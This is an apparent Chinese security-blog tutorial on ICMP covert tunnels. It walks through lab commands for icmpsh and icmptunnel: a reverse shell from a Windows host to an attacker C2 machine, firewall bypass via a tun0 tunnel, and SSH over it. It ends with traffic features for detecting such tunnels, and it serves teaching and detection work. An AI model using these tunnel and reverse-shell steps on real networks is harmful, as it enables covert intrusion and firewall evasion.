freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网隐蔽隧道-ICMP隧道流量分析
风起云涌123 2023-10-07 14:28:32 135851

ICMP协议

ICMP协议简介ICMP是“Internet Control Message Protocol”(Internet控制消息协议)的缩写。它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。

1696658854_6520f5a6059e413cd49d0.png!small?1696658854239

正常的ICMP流量

1696658997_6520f635eada32ef0c364.png!small?1696658998558

ICMP隧道工具

在一些网络环境中,攻击者会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙,实现不受限制的网络访问。

典型工具:

icmpsh

powershell icmp

icmptunnel

ptunnel

ICMP隧道工具-icmpsh

icmpsh工具使用简单,是一个跨平台工具,运行不需要管理员权限。

icmpsh下载地址:

https://github.com/inquisb/icmpsh

环境:

攻击机/C2通道:192.168.159.185(Kali Linux)

宿主机:192.168.159.158(Windows 7)

以主模式运行icmpsh(Kali Linux)

关闭ping回复,防止内核自己对ping包进行响应

sysctl -w net.ipv4.icmp_echo_ignore_all=1

./icmpsh_m.py 192.168.1.185 192.168.1.158

然后在Win7上执行命令:

icmpsh.exe -t 192.168.217.185

成功反弹shell到kali

1696659268_6520f7440668eed360b61.png!small?1696659268408

ICMP隧道工具-icmptunnel

icmptunnel是一个将IP流量封装到 ICMP echo请求和回复(ping)包中的隧道工具,是在允许 ping 的网络中进行拓展、绕过防火墙的一种半隐蔽方式。

下载地址:

https://github.com/jamesbarlow/icmptunnel

攻击机:192.168.159.169

靶机:192.168.159.184

攻击机和靶机执行

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all      #禁用icmp回复

攻击机执行

./icmptunnel -s                  #监听

重新打开一个命令行窗口

ifconfig tun0 10.0.0.1 netmask 255.255.255.0  #添加tun0网卡,分配隧道地址10.0.0.1/24

1696659518_6520f83e4bd87aa077e04.png!small?1696659518681

靶机执行

./icmptunnel 192.168.159.169  #连接服务端

重新打开一个命令行窗口

ifconfig tun0 10.0.0.2 netmask 255.255.255.0          #添加tun0网卡,分配隧道地址10.0.0.2/24

1696659527_6520f8471de361d4b5709.png!small?1696659527609

在攻击机上进行ssh连接

ssh root@10.0.0.2

1696659534_6520f84e2066a41e5b90c.png!small?1696659534723

成功链接。

ICMP隧道流量特征

1.ICMP会话种数据包总数较大

1696659652_6520f8c4da7697f93d91d.png!small?1696659653439

2.隧道中单个数据包传输的数据量较大

1696659688_6520f8e87c04763c9c775.png!small?1696659688755

3.请求包和响应包不一致

1696659720_6520f908c2b5fd3f1008c.png!small?1696659721312

1696659726_6520f90ef169b6e8f539a.png!small?1696659727525

4.部分隧道工具会显示tun的标志

1696659752_6520f928b18f93d4f57f5.png!small?1696659753253

# 网络安全 # 系统安全 # 数据安全
本文为 风起云涌123 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
渗透测试技术分享
风起云涌123 LV.5
安全研究员,拥有CRTO证书
  • 22 文章数
  • 10 关注者
基于deepseek本地大模型的敏感信息检测的burp插件开发
2025-02-06
tomcat takeover靶场实战
2024-07-11
CRTO(Certified Red Team Operator )课程和认证经验分享
2024-01-01
文章目录